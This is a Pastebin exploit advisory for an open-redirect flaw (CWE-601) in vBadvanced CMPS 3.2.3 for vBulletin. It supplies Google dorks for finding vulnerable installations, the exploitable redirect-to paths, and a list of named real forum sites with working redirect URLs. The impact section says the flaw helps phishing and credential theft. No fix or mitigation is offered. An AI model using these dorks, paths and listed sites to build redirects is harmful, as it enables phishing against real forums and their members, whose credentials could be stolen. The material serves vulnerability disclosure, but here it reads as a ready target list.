KingSkrupellos

vBulletin 3.8.x vBadvanced CMPS v3.2.3 Open Redirection

Mar 1st, 2019
55
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.67 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : vBulletin 3.8.x vBadvanced CMPS v3.2.3 Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/03/2019
  7. # Vendor Homepage : vbulletin.com ~ vbadvanced.com
  8. # Software Download Link : vbadvanced.com/products.php?do=productinfo&productid=4
  9. # Software Information Link : vietvbb.vn/up/showthread.php?t=66952
  10. # Software Version : 3.2.3
  11. # Sofware Technical Requirements :
  12. vBulletin 3.6.0 - 3.8.x or higher. - PHP 4.0.6 or higher. - MySQL 3.23 or higher is recommended.
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Google Dorks : intext:"Powered by vBadvanced CMPS v3.2.3"
  17. Powered by vBadvanced CMPS v3.2.3 intext:vBSecurity v2.2.2 (Pro)
  18. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. vBadvanced CMPS (Content Management & Portal System) is an advanced portal / CMS
  28.  
  29. that allows you to easily include elements from your vBulletin message board on your web
  30.  
  31. site's homepage, or other pages. It's module system (w/ 14 default modules included) makes
  32.  
  33. almost every aspect of the software easy to customize and change through your Admin CP.
  34.  
  35. Easily create and manage new pages with your own custom content with the ability to change
  36.  
  37. every setting on a per-page basis. Integrating CMPS modules with your vBulletin forum
  38.  
  39. pages can also be done with no file modifications required.
  40.  
  41. ####################################################################
  42.  
  43. # Impact :
  44. ***********
  45. This web application vBulletin 3.8.x vBadvanced CMPS v3.2.3 accepts a user-controlled
  46.  
  47. input that specifies a link to an external site, and uses that link in a Redirect.
  48.  
  49. This simplifies phishing attacks. An http parameter may contain a URL value and could cause
  50.  
  51. the web application to redirect the request to the specified URL. By modifying the URL value
  52.  
  53. to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  54.  
  55. Because the server name in the modified link is identical to the original site, phishing attempts
  56.  
  57. have a more trustworthy appearance.
  58.  
  59. Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
  60.  
  61. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
  62.  
  63. Web users often encounter redirection when they visit the Web site of a company whose name
  64.  
  65. has been changed or which has been acquired by another company. Visiting unreal web page
  66.  
  67. user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
  68.  
  69. ####################################################################
  70.  
  71. # Open Redirection Exploit :
  72. **************************
  73. /redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
  74.  
  75. /forum/redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
  76.  
  77. /forums/redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
  78.  
  79. ####################################################################
  80.  
  81. # Example Vulnerable Sites :
  82. *************************
  83. [+] parrotforums.com/redirect-to/?redirect=https://cxsecurity.com/
  84.  
  85. [+] camarozone.com/forum/redirect-to/?redirect=https://cxsecurity.com/
  86.  
  87. [+] coloradofisherman.com/forum/redirect-to/?redirect=https://cxsecurity.com/
  88.  
  89. [+] caraudioclassifieds.org/forum/redirect-to/?redirect=https://cxsecurity.com/
  90.  
  91. [+] techsupportforum.com/forums/redirect-to/?redirect=https://cxsecurity.com/
  92.  
  93. [+] labradorforums.co.uk/redirect-to/?redirect=https://cxsecurity.com/
  94.  
  95. [+] waltherforums.com/forum/redirect-to/?redirect=https://cxsecurity.com/
  96.  
  97. [+] cascadaclub.com/forums/redirect-to/?redirect=https://cxsecurity.com/
  98.  
  99. [+] chicagolandfishing.com/forums/redirect-to/?redirect=https://cxsecurity.com/
  100.  
  101. [+] dendroboard.com/forum/redirect-to/?redirect=https://cxsecurity.com/
  102.  
  103. [+] insightcentral.net/forums/redirect-to/?redirect=https://cxsecurity.com/
  104.  
  105. [+] chicagolandfishing.com/forums/redirect-to/?redirect=https://cxsecurity.com/
  106.  
  107. [+] germanshepherds.com/forum/redirect-to/?redirect=https://cxsecurity.com/
  108.  
  109. ####################################################################
  110.  
  111. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  112.  
  113. ####################################################################
Add Comment
Please, Sign In to add comment